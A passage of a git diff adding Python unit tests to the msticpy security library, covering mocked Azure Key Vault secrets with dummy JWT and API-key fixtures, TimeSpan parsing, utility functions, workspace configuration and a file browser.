+        with self.assertRaises(MsticpyKeyVaultMissingSecretError):
+            keyvault_client.get_secret("NoSecret")
+
+        kv_sec_client.set_secret("MyTestSecret", "TheActualValue")
+        self.assertEqual(keyvault_client.get_secret("MyTestSecret"), "TheActualValue")
+
+    @patch(kv_mgmt_client_patch)
+    @patch(az_connect_core_patch)
+    def test_kv_mgmt_client(self, az_core, kv_mgmt):
+        AzCredentials = namedtuple("AzCredentials", ["legacy", "modern"])
+        LegacyCreds = namedtuple("legacycreds", ["token"])
+        az_core.return_value = AzCredentials(LegacyCreds(ACC_TOKEN), "cred")
+        # expiry_time = datetime.now() + timedelta(1)
+        # auth_context.return_value = mock_auth_context_methods(expiry_time)
+        kv_mgmt.return_value = _KeyVaultMgmtMock()
+        # kv_sec_client = _SecretClientTest()
+
+        kv_settings = get_kv_settings("msticpyconfig-kv.yaml")
+        vault_mgmt = BHKeyVaultMgmtClient(
+            tenant_id=kv_settings.tenantid,
+            subscription_id=kv_settings.subscriptionid,
+            resource_group=kv_settings.resourcegroup,
+            azure_region=kv_settings.azureregion,
+        )
+
+        vault_mgmt.create_vault("mynewvault")
+        vault_mgmt.create_vault("myothervault")
+        self.assertIn("mynewvault", vault_mgmt.list_vaults())
+        self.assertIn("myothervault", vault_mgmt.list_vaults())
+
+        self.assertEqual(
+            vault_mgmt.get_vault_uri("mynewvault"), "https://mynewvault.vault.azure.net"
+        )
+
+        kv_settings = get_kv_settings("msticpyconfig-kv.yaml")
+        kv_settings["azureregion"] = None
+        with self.assertRaises(MsticpyKeyVaultConfigError):
+            nr_vault_mgmt = BHKeyVaultMgmtClient(
+                tenant_id=kv_settings.tenantid,
+                subscription_id=kv_settings.subscriptionid,
+                resource_group=kv_settings.resourcegroup,
+                settings=kv_settings,
+            )
+            nr_vault_mgmt.create_vault("mynewvault")
+
+    @patch(sec_client_patch)
+    def test_secret_settings(
+        self,
+        sec_client,
+    ):
+        kv_sec_client = _SecretClientTest()
+        sec_client_obj = MagicMock()
+        sec_client_obj.list_properties_of_secrets = (
+            kv_sec_client.list_properties_of_secrets
+        )
+        sec_client_obj.get_secret = kv_sec_client.get_secret
+        sec_client_obj.set_secret = kv_sec_client.set_secret
+        sec_client.return_value = sec_client_obj
+
+        # Check single value
+        get_kv_settings("msticpyconfig-kv.yaml")
+        sec_settings = secret_settings.SecretsClient()
+        kv_entry_name = "TIProviders-VirusTotal-Args-AuthKey"
+        conf_path = kv_entry_name.replace("-", ".")
+        setting_func = sec_settings.get_secret_accessor(conf_path)
+        self.assertTrue(callable(setting_func))
+        sec_value = sec_settings.read_secret(setting_func)
+        self.assertEqual(KV_SECRETS[kv_entry_name], sec_value)
+
+        # Check all TIProvider settings
+        self._check_provider_settings(sec_settings)
+
+        # Reload without using keyring cache
+        sec_settings = secret_settings.SecretsClient(use_keyring=False)
+        self._check_provider_settings(sec_settings)
+
+    def _check_provider_settings(self, sec_settings):
+        prov_settings = get_provider_settings()
+        for p_name, p_settings in prov_settings.items():
+            args = p_settings.args
+            if p_name == "OTX":
+                sec_value = sec_settings.read_secret(args["AuthKey"])
+                self.assertEqual(KV_SECRETS["OTX-AuthKey"], sec_value)
+            elif p_name == "VirusTotal":
+                sec_value = sec_settings.read_secret(args["AuthKey"])
+                self.assertEqual(
+                    KV_SECRETS["TIProviders-VirusTotal-Args-AuthKey"], sec_value
+                )
+            elif p_name == "XForce":
+                sec_value = sec_settings.read_secret(args["AuthKey"])
+                self.assertEqual(KV_SECRETS["XForce-AuthKey"], sec_value)
+                sec_value = sec_settings.read_secret(args["ApiID"])
+                self.assertEqual(KV_SECRETS["XForce-ApiID"], sec_value)
+
+
+def test_keyring_client():
+    secret_settings.KeyringClient.is_keyring_available()
+
+
+# Helper functions
+def get_kv_settings(config_file):
+    test_config = Path(_TEST_DATA).joinpath(config_file)
+    os.environ[pkg_config._CONFIG_ENV_VAR] = str(test_config)
+    with warnings.catch_warnings():
+        # We want to ignore warnings from missing config
+        warnings.simplefilter("ignore", category=UserWarning)
+        with custom_mp_config(test_config):
+            return KeyVaultSettings()
+
+
+def mock_auth_context_methods(expiry_time):
+    context_obj = MagicMock()
+    context_obj.acquire_user_code = MagicMock(return_value=DEV_CODE)
+    context_obj.acquire_token_with_device_code = MagicMock(return_value=TEST_TOKEN)
+    refresh_token = deepcopy(TEST_TOKEN)
+
+    refresh_token["expiresOn"] = expiry_time.strftime("%Y-%m-%d %H:%M:%S.%f")
+    # acquire_with_refresh.return_value = refresh_token
+    context_obj.acquire_token_with_refresh_token = MagicMock(return_value=refresh_token)
+    return context_obj
+
+
+# Constants
+ACC_TOKEN_LINES = [
+    "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ik1ERXlNelExTmpjNE9UQXhNak0w",
+    "XzZ0X3RERSIsImtpZCI6Ik1ERXlNelExTmpjNE9UQXhNak0wXzZ0X3RERSJ9.eyJhdWQiOiJ",
+    "odHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG9",
+    "3cy5uZXQvZmZmZmZmZmYtODg4OC00NDQ0LWFhYWEtMmQyZDJkMmQyZDJkLyIsImlhdCI6MTU",
+    "4MzM3NTcyNiwibmJmIjoxNTgzMzc1NzI2LCJleHAiOjE1ODMzNzk2MjYsIl9jbGFpbV9uYW1",
+    "lcyI6eyJncm91cHMiOiJzcmMxIn0sIl9jbGFpbV9zb3VyY2VzIjp7InNyYzEiOnsiZW5kcG9",
+    "pbnQiOiJodHRwczovL2dyYXBoLndpbmRvd3MubmV0L2ZmZmZmZmZmLTg4ODgtNDQ0NC1hYWF",
+    "hLTJkMmQyZDJkMmQyZC91c2Vycy9lYWVhZWFlYS03Nzc3LTAwMDAtZWVlZS1lN2U3ZTdlN2U",
+    "3ZTcvZ2V0TWVtYmVyT2JqZWN0cyJ9fSwiYWNyIjoiMSIsImFpbyI6Ik1ERXlNelExTmpjNE9",
+    "UQXhNak0wTlRZM09Ea3dNVEl6TkRVMk56ZzVNREV5TXpRMU5qYzRPVEF4TWpNME5UWTNPRGt",
+    "3TVRJek1ERXlNelExTmpjNE9UQXhNak0wTlRZM09Ea3dNVEl6TkRVMk56ZzVNREV5TXpRMSI",
+    "sImFtciI6WyJwd2QiLCJtZmEiXSwiYXBwaWQiOiIwNGIwNzc5NS04ZGRiLTQ2MWEtYmJlZS0",
+    "wMmY5ZTFiZjdiNDYiLCJhcHBpZGFjciI6IjAiLCJmYW1pbHlfbmFtZSI6IlVzZXIiLCJnaXZ",
+    "lbl9uYW1lIjoiVGVzdCIsImlwYWRkciI6IjE5Mi4xNjguMS4yMiIsIm5hbWUiOiJUZXN0IFV",
+    "zZXIiLCJvaWQiOiJlYWVhZWFlYS03Nzc3LTAwMDAtZWVlZS1lN2U3ZTdlN2U3ZTciLCJvbnB",
+    "yZW1fc2lkIjoiUy0xLTUtMjEtMDEyMzQ1Njc4OS0wMTIzNDU2Nzg5LTAxMjM0NTY3ODktMDE",
+    "yMzQ1NiIsInB1aWQiOiIxMDAwMDAwMDAwMDAwMDAwIiwic2NwIjoidXNlcl9pbXBlcnNvbmF",
+    "0aW9uIiwic3ViIjoiTURFeU16UTFOamM0T1RBeE1qTTBOVFkzT0Rrd01USXpORFUyTnpnNU1",
+    "ERXkiLCJ0aWQiOiJmZmZmZmZmZi04ODg4LTQ0NDQtYWFhYS0yZDJkMmQyZDJkMmQiLCJ1bml",
+    "xdWVfbmFtZSI6InRlc3R1c2VyQG1pY3Jvc29mdC5jb20iLCJ1cG4iOiJ0ZXN0dXNlckBtaWN",
+    "yb3NvZnQuY29tIiwidXRpIjoiTURFeU16UV9NREV5TXpRTURFeU16USIsInZlciI6IjEuMCJ",
+    "9.MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMT",
+    "Iz.NDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0N",
+    "TY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4O",
+    "TAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyM",
+    "zQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2N",
+    "zg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwM",
+    "TIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0N",
+    "TY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4O",
+    "TAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyM",
+    "zQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2N",
+    "zg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwM",
+    "TIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0N",
+    "TY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4O",
+    "TAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyM",
+    "zQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2N",
+    "zg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OQ==",
+]
+
+
+ACC_TOKEN = "".join(ACC_TOKEN_LINES)
+
+
+REF_TOKEN = """
+MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz
+NDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3
+ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAx
+MjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1
+Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5
+MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz
+NDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3
+ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAx
+MjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1
+Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5
+MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz
+NDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3
+ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAx
+MjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1
+Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5
+MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OQ==
+"""
+
+TEST_TOKEN = {
+    "tokenType": "Bearer",
+    "expiresIn": 3598,
+    "expiresOn": "2020-03-04 19:40:25.132471",
+    "resource": "https://management.azure.com",
+    "accessToken": ACC_TOKEN,
+    "refreshToken": REF_TOKEN,
+    "familyName": "User",
+    "givenName": "Test",
+    "oid": "eaeaeaea-7777-0000-eeee-e7e7e7e7e7e7",
+    "tenantId": "ffffffff-8888-4444-aaaa-2d2d2d2d2d2d",
+    "userId": "testuser@microsoft.com",
+    "isUserIdDisplayable": True,
+    "isMRRT": True,
+    "_clientId": "04b07795-8ddb-461a-bbee-02f9e1bf7b46",
+    "_authority": "https://login.microsoftonline.com/ffffffff-8888-4444-aaaa-2d2d2d2d2d2d",
+}
+
+DEV_CODE = {
+    "user_code": "BHNDTAGMG",
+    "device_code": "eadef8f0-7799-4087-9eb7-c1e7a055616d",
+    "verification_url": "https://microsoft.com/devicelogin",
+    "expires_in": 900,
+    "interval": 5,
+    "message": "To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code BHNDTAGMG to authenticate.",
+    "correlation_id": "42b6684f-2d31-4673-a1c4-f0a35f80ad82",
+}
+
+# These are the first two sections of the ACC_TOKEN above
+# Take the first two "." separated sections of the section
+# and base64-decode the two strings.
+# The third section of the token is a series of b64 encoded
+# elements separated by "_" and "-"
+j_token_header = {
+    "typ": "JWT",
+    "alg": "RS256",
+    "x5t": "MDEyMzQ1Njc4OTAxMjM0_6t_tDE",
+    "kid": "MDEyMzQ1Njc4OTAxMjM0_6t_tDE",
+}
+
+j_acc_token = {
+    "aud": "https://management.azure.com",
+    "iss": "https://sts.windows.net/ffffffff-8888-4444-aaaa-2d2d2d2d2d2d/",
+    "iat": 1583375726,
+    "nbf": 1583375726,
+    "exp": 1583379626,
+    "_claim_names": {"groups": "src1"},
+    "_claim_sources": {
+        "src1": {
+            "endpoint": "https://graph.windows.net/ffffffff-8888-4444-aaaa-2d2d2d2d2d2d/users/eaeaeaea-7777-0000-eeee-e7e7e7e7e7e7/getMemberObjects"
+        }
+    },
+    "acr": "1",
+    "aio": "MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzMDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1",
+    "amr": ["pwd", "mfa"],
+    "appid": "04b07795-8ddb-461a-bbee-02f9e1bf7b46",
+    "appidacr": "0",
+    "family_name": "User",
+    "given_name": "Test",
+    "ipaddr": "192.168.1.22",
+    "name": "Test User",
+    "oid": "eaeaeaea-7777-0000-eeee-e7e7e7e7e7e7",
+    "onprem_sid": "S-1-5-21-0424246789-0424246789-0424246789-0424246",
+    "puid": "1000000000000000",
+    "scp": "user_impersonation",
+    "sub": "MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEy",
+    "tid": "ffffffff-8888-4444-aaaa-2d2d2d2d2d2d",
+    "unique_name": "testuser@microsoft.com",
+    "upn": "testuser@microsoft.com",
+    "uti": "MDEyMzQ_MDEyMzQMDEyMzQ",
+    "ver": "1.0",
+}
+
+
+KV_SECRETS = {
+    "OTX-AuthKey": "OTX_AuthKey",
+    "TIProviders-VirusTotal-Args-AuthKey": "42424678",
+    "VirusTotal-AuthKey": "VirusTotal_AuthKey",
+    "XForce-ApiID": "OTX_ApiID",
+    "XForce-AuthKey": "XForce_AuthKey",
+}
diff --git a/tests/common/test_timespan.py b/tests/common/test_timespan.py
new file mode 100644
index 000000000..67288133a
--- /dev/null
+++ b/tests/common/test_timespan.py
@@ -0,0 +1,111 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Timespan unit test."""
+from datetime import datetime, timedelta
+
+import pytest
+import pytest_check as check
+from msticpy.common.timespan import TimeSpan
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name
+
+
+def _validate_timespan(timespan, start=None, end=None, period=None):
+    if start is not None:
+        check.equal(start, timespan.start)
+    if end is not None:
+        check.equal(end, timespan.end)
+    if period is not None:
+        check.equal(period, timespan.period)
+
+
+def test_timespan_parms():
+    """Test standard parameters."""
+    end = datetime.utcnow()
+    period = timedelta(days=1)
+    start = end - period
+    tspan = TimeSpan(start=start, end=end)
+    _validate_timespan(tspan, start, end)
+
+    tspan = TimeSpan(end=end, period=period)
+    _validate_timespan(tspan, start, end)
+
+    tspan = TimeSpan(end=end, period="1D")
+    _validate_timespan(tspan, start, end)
+
+    tspan = TimeSpan(end=str(end), period="1D")
+    _validate_timespan(tspan, start, end)
+
+    tspan = TimeSpan(start=str(start), end=str(end))
+    _validate_timespan(tspan, start, end)
+
+    tspan = TimeSpan(start=str(start), period="1D")
+    _validate_timespan(tspan, start, end)
+
+    # end is set to utcnow()
+    tspan = TimeSpan(start=start)
+    _validate_timespan(tspan, start)
+
+    # end is set to utcnow()
+    tspan = TimeSpan(period=period)
+    _validate_timespan(tspan, period=period)
+
+
+def test_timespan_eq():
+    """Test creating Timespan from another Timespan."""
+    period = timedelta(days=1)
+    tspan = TimeSpan(period=period)
+
+    # Timespan object as a parameter
+    tspan2 = TimeSpan(timespan=tspan)
+    check.equal(tspan2, tspan)
+    check.equal(hash(tspan2), hash(tspan))
+
+    tspan2 = TimeSpan(timespan=(tspan.start, tspan.end))
+    check.equal(tspan2, tspan)
+    tspan2 = TimeSpan(timespan=(str(tspan.start), str(tspan.end)))
+    check.equal(tspan2, tspan)
+
+
+def test_timespan_timeselector():
+    """Test timespan with a time selector object."""
+    end = datetime.utcnow()
+    period = timedelta(days=1)
+    start = end - period
+    tspan = TimeSpan(period=period)
+
+    # pylint: disable=too-few-public-methods
+    class _TestTime:
+        """Class to emulate QueryTimes widget. etc."""
+
+        start = None
+        end = None
+        period = None
+
+    test_t = _TestTime()
+    test_t.start = start
+    test_t.end = str(end)
+    test_t.period = "1D"
+
+    tspan = TimeSpan(timespan=test_t)
+    _validate_timespan(tspan, start, end)
+
+
+def test_timespan_invalid_params():
+    """Test error handling for invalid params."""
+    period = timedelta(days=1)
+    with pytest.raises(ValueError):
+        TimeSpan()
+    with pytest.raises(ValueError):
+        TimeSpan(start="foo", period=period)
+    with pytest.raises(ValueError):
+        TimeSpan(start=None, end=None)
+    with pytest.raises(ValueError):
+        TimeSpan(period="some length")
+    with pytest.raises(ValueError):
+        TimeSpan(period=1)
diff --git a/tests/common/test_utils.py b/tests/common/test_utils.py
new file mode 100644
index 000000000..6cb0ca509
--- /dev/null
+++ b/tests/common/test_utils.py
@@ -0,0 +1,148 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""vtlookup test class."""
+from pathlib import Path
+import unittest
+
+import pytest_check as check
+
+from msticpy.nbtools import utils
+
+
+class TestUtils(unittest.TestCase):
+    """Unit test class."""
+
+    def test_misc_funcs(self):
+        self.assertTrue(utils.string_empty(None))
+        self.assertTrue(utils.string_empty(""))
+
+        self.assertFalse(utils.is_not_empty(None))
+        self.assertFalse(utils.is_not_empty(""))
+        self.assertFalse(utils.is_not_empty({}))
+
+        self.assertEqual(utils.escape_windows_path("C:\\windows"), "C:\\\\windows")
+        self.assertEqual(utils.escape_windows_path("C:/windows"), "C:/windows")
+
+        self.assertEqual(utils.unescape_windows_path("C:\\\\windows"), "C:\\windows")
+        self.assertEqual(utils.unescape_windows_path("C:/windows"), "C:/windows")
+
+        with self.assertRaises(SystemExit):
+            utils.check_py_version((4, 0))
+        utils.check_py_version((3, 6))
+        utils.check_py_version(3.6)
+        utils.check_py_version("3.6")
+
+        abs_path = "/etc" if Path("/etc").is_absolute() else "c:\\windows"
+        self.assertEqual(utils.resolve_pkg_path(abs_path), abs_path)
+        self.assertIsNotNone(utils.resolve_pkg_path("sectools"))
+        with self.assertWarns(UserWarning):
+            utils.resolve_pkg_path("somefakefolder")
+
+    def test_md(self):
+        utils.md("test")
+        utils.md("test", "red, bold")
+        utils.md("test", ["red", "bold"])
+
+    def test_kwarg_check(self):
+        _DEFAULT_KWARGS = [
+            "color",
+            "data",
+            "group_by",
+            "height",
+            "legend",
+            "range_tool",
+            "ref_event",
+            "ref_time",
+            "source_columns",
+            "time_column",
+            "title",
+            "width",
+            "yaxis",
+        ]
+
+        args_ok = {"color": "red"}
+        args_bad = {"color": "red", "datum": "dframe"}
+        args2_bad = {"color": "red", "columns": "dframe", "datum": "dframe"}
+
+        utils.check_kwargs(args_ok, _DEFAULT_KWARGS)
+        try:
+            utils.check_kwargs(args_bad, _DEFAULT_KWARGS)
+        except NameError as err:
+            self.assertIsNotNone(err)
+            self.assertIn("datum", err.args[0][0].args)
+        try:
+            utils.check_kwargs(args2_bad, _DEFAULT_KWARGS)
+        except NameError as err:
+            self.assertEqual(len(err.args[0]), 2)
+            self.assertIn("columns", err.args[0][0].args)
+            self.assertIn("source_columns", err.args[0][0].args[1])
+            self.assertIn("time_column", err.args[0][0].args[1])
+            self.assertIn("datum", err.args[0][1].args)
+
+
+def test_format_py_identifier():
+    """Test replacing illegal chars in identifier."""
+    check.equal(utils.valid_pyname("legal"), "legal")
+    check.equal(utils.valid_pyname("open"), "open_bi")
+    check.equal(utils.valid_pyname("has space"), "has_space")
+    check.equal(utils.valid_pyname("has-dash"), "has_dash")
+    check.equal(utils.valid_pyname("10.starts,digit$"), "n_10_starts_digit_")
+
+
+_D1 = {
+    "one": "d1_one_val",
+    "two": {"two_c": "d1_two_val"},
+    "five": {
+        "five_c": {"five_cc": "d1_five_val"},
+        "seven": "d1_seven_val",
+    },
+    "eight": "d1_eight_val",
+}
+_D2 = {"one": "d2_one_val", "four": {"four_c": "d2_four_val"}, "three": "d2_three_val"}
+_D3 = {
+    "one": "d3_one_val",
+    "two": {"two_c": "d3_two_val"},
+    "five": {
+        "five_c": {"five_cc": "d3_five_val"},
+        "six": "d3_six_val",
+    },
+}
+
+
+def test_collapse_dicts():
+    """Test collapsing one or more dictionaries."""
+    d_out = utils.collapse_dicts(_D1)
+    check.equal(d_out, _D1)
+
+    d_out = utils.collapse_dicts(_D1, _D2)
+    check.equal(
+        d_out,
+        {
+            "three": "d2_three_val",
+            "one": "d2_one_val",
+            "four": {"four_c": "d2_four_val"},
+            "five": {"five_c": {"five_cc": "d1_five_val"}, "seven": "d1_seven_val"},
+            "eight": "d1_eight_val",
+            "two": {"two_c": "d1_two_val"},
+        },
+    )
+
+    d_out = utils.collapse_dicts(_D1, _D2, _D3)
+    check.equal(
+        d_out,
+        {
+            "one": "d3_one_val",
+            "eight": "d1_eight_val",
+            "four": {"four_c": "d2_four_val"},
+            "three": "d2_three_val",
+            "five": {
+                "seven": "d1_seven_val",
+                "five_c": {"five_cc": "d3_five_val"},
+                "six": "d3_six_val",
+            },
+            "two": {"two_c": "d3_two_val"},
+        },
+    )
diff --git a/tests/common/test_wsconfig.py b/tests/common/test_wsconfig.py
new file mode 100644
index 000000000..ed85022ff
--- /dev/null
+++ b/tests/common/test_wsconfig.py
@@ -0,0 +1,113 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""WorkspaceConfig test class."""
+import io
+import unittest
+from contextlib import redirect_stdout
+from pathlib import Path
+
+from msticpy.common import pkg_config
+from msticpy.common.wsconfig import WorkspaceConfig
+
+from ..unit_test_lib import get_test_data_path, custom_mp_config
+
+_TEST_DATA = get_test_data_path()
+
+# pylint: disable=protected-access
+
+
+class TestPkgConfig(unittest.TestCase):
+    """Unit test class."""
+
+    def test_wsconfig_default_ws(self):
+        """Test WorkspaceConfig."""
+        test_config1 = Path(_TEST_DATA).joinpath(pkg_config._CONFIG_FILE)
+        with custom_mp_config(test_config1):
+            # Default workspace
+            _DEF_WS = {
+                "WorkspaceId": "52b1ab41-869e-4138-9e40-2a4457f09bf3",
+                "TenantId": "72f988bf-86f1-41af-91ab-2d7cd011db49",
+            }
+            ws_config = WorkspaceConfig()
+            self.assertIn("workspace_id", ws_config)
+            self.assertEqual(ws_config["workspace_id"], _DEF_WS["WorkspaceId"])
+            self.assertIn("tenant_id", ws_config)
+            self.assertEqual(ws_config["tenant_id"], _DEF_WS["TenantId"])
+            self.assertIsNotNone(ws_config.code_connect_str)
+            self.assertTrue(
+                ws_config.code_connect_str.startswith("loganalytics://code().tenant(")
+                and _DEF_WS["WorkspaceId"] in ws_config.code_connect_str
+                and _DEF_WS["TenantId"] in ws_config.code_connect_str
+            )
+
+    def test_wsconfig_named_ws(self):
+        """Test WorkspaceConfig."""
+        test_config1 = Path(_TEST_DATA).joinpath(pkg_config._CONFIG_FILE)
+        with custom_mp_config(test_config1):
+            # Named workspace
+            _NAMED_WS = {
+                "WorkspaceId": "a927809c-8142-43e1-96b3-4ad87cfe95a3",
+                "TenantId": "69d28fd7-42a5-48bc-a619-af56397b9f28",
+            }
+            wstest_config = WorkspaceConfig(workspace="MyTestWS")
+            self.assertIn("workspace_id", wstest_config)
+            self.assertIsNotNone(wstest_config["workspace_id"])
+            self.assertEqual(wstest_config["workspace_id"], _NAMED_WS["WorkspaceId"])
+            self.assertIn("tenant_id", wstest_config)
+            self.assertEqual(wstest_config["tenant_id"], _NAMED_WS["TenantId"])
+            self.assertIsNotNone(wstest_config.code_connect_str)
+            self.assertTrue(
+                wstest_config.code_connect_str.startswith(
+                    "loganalytics://code().tenant("
+                )
+                and _NAMED_WS["WorkspaceId"] in wstest_config.code_connect_str
+                and _NAMED_WS["TenantId"] in wstest_config.code_connect_str
+            )
+
+    def test_wsconfig_config_json_fallback(self):
+        # Fallback to config.json
+        test_config2 = Path(_TEST_DATA).joinpath("msticpyconfig-noAzSentSettings.yaml")
+        with custom_mp_config(test_config2):
+            _NAMED_WS = {
+                "WorkspaceId": "9997809c-8142-43e1-96b3-4ad87cfe95a3",
+                "TenantId": "99928fd7-42a5-48bc-a619-af56397b9f28",
+            }
+            wrn_mssg = io.StringIO()
+            with redirect_stdout(wrn_mssg):
+                wstest_config = WorkspaceConfig()
+            self.assertIn(
+                "Could not find Microsoft Sentinel settings", wrn_mssg.getvalue()
+            )
+            self.assertIn("workspace_id", wstest_config)
+            self.assertIsNotNone(wstest_config["workspace_id"])
+            self.assertEqual(wstest_config["workspace_id"], _NAMED_WS["WorkspaceId"])
+            self.assertIn("tenant_id", wstest_config)
+            self.assertEqual(wstest_config["tenant_id"], _NAMED_WS["TenantId"])
+            self.assertIsNotNone(wstest_config.code_connect_str)
+            self.assertTrue(
+                wstest_config.code_connect_str.startswith(
+                    "loganalytics://code().tenant("
+                )
+                and _NAMED_WS["WorkspaceId"] in wstest_config.code_connect_str
+                and _NAMED_WS["TenantId"] in wstest_config.code_connect_str
+            )
+
+    def test_wsconfig_misc_funcs(self):
+        """Test miscellaneous functions."""
+        test_config1 = Path(_TEST_DATA).joinpath(pkg_config._CONFIG_FILE)
+        with custom_mp_config(test_config1):
+            ws_dict = WorkspaceConfig.list_workspaces()
+            self.assertIn("Default", ws_dict)
+            self.assertEqual(
+                ws_dict["Default"]["WorkspaceId"],
+                "52b1ab41-869e-4138-9e40-2a4457f09bf3",
+            )
+            self.assertEqual(
+                ws_dict["MyTestWS"]["WorkspaceId"],
+                "a927809c-8142-43e1-96b3-4ad87cfe95a3",
+            )
+            ws_config = WorkspaceConfig()
+            ws_config.prompt_for_ws()
diff --git a/tests/config/__init__.py b/tests/config/__init__.py
new file mode 100644
index 000000000..6ea13d44c
--- /dev/null
+++ b/tests/config/__init__.py
@@ -0,0 +1,6 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Init for test package."""
diff --git a/tests/config/test_file_browser.py b/tests/config/test_file_browser.py
new file mode 100644
index 000000000..c872194dd
--- /dev/null
+++ b/tests/config/test_file_browser.py
@@ -0,0 +1,43 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module docstring."""
+
+import pytest_check as check
+from msticpy.config.file_browser import FileBrowser
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=protected-access, global-statement, invalid-name
+file_name = ""
+
+
+def test_file_browser():
+    """Function_docstring."""
+    f_brow = FileBrowser(".", select_cb=_callback)
+    starting_folder = f_brow.current_folder
+    check.greater(len(f_brow.select_file.options), 0)
+    check.greater(len(f_brow.select_folder.options), 0)
+    check.is_in("..", f_brow.select_folder.options)
+    curr_files = f_brow.select_file.options
